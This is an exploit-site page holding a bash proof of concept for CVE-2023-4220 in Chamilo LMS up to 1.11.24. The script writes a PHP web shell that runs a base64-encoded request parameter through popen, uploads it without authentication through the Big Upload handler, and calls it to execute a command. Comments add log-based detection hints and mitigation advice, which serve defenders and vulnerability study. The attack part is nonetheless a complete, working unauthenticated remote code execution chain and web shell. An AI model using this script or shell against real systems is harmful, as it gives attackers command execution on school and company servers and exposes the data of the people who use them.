## https://sploitus.com/exploit?id=DFE9BBDB-BA64-57BE-ABCA-8364EBDD9116
#################################
CVE-2023-4220 RCE Chamilo 1.11.24
#################################

| https://starlabs.sg/advisories/23/23-4220/
|
| Chamilo LMS <= 1.11.24 (Beersel, 31/08/2023)
| Unauthenticated file upload leading to remote code execution in the "Big Upload" library
|
| To identify the installed version, check: /documentation/changelog.html
|
| POC EXPLOIT CVE RCE VULN
|

.. code-block:: bash

  #!/bin/bash
  # Proof of concept for CVE-2023-4220 (Chamilo LMS "Big Upload" library).
  # Flow: write a PHP file locally, upload it through bigUpload.php, then
  # request the uploaded file and print what comes back. Neither curl call
  # below sends a cookie, header or credential.
  #
  # Defender view of the same flow:
  #   - Detection: an access-log entry for bigUpload.php with
  #     action=post-unsupported, followed by a request for a .php file under
  #     bigupload/files/, matches this script. Any .php file present in that
  #     directory is worth investigating.
  #   - Mitigation: move off the affected range (<= 1.11.24 per this page) and
  #     prevent the web server from executing PHP under bigupload/files/.
  #     NOTE(review): the fixed release number is not stated on this page;
  #     take it from the vendor / STAR Labs advisory.

  # HOST is the base URL of the Chamilo instance; CMD is the command whose
  # output the final request returns.
  HOST='http://lms.domain.com'
  CMD='id'
  
  # Paths relative to HOST: the upload handler, and the location the script
  # expects the upload to land at (same bigupload/ tree, files/ sub-directory,
  # under the client-supplied file name).
  URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
  URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'
  
  # The quoted delimiter ('EOF') writes the PHP text verbatim, with no shell
  # expansion. The PHP base64-decodes request parameter "aoOoy", passes it to
  # popen() and echoes the output line by line, flushing after each line.
  cat <<'EOF'>/tmp/rce.php
  <?php
  $a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a);
  ?>
  EOF
  
  # Multipart POST carrying the file in form field "bigUploadFile".
  curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD"
  # Base64-encode CMD on a single line (-w0), then URL-encode the result so
  # it survives as a query-string value.
  CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")
  # Request the uploaded file with the encoded command in "aoOoy"; the
  # response body is whatever the PHP file echoes.
  curl "$HOST/$URL_FILE?aoOoy=$CMD"

|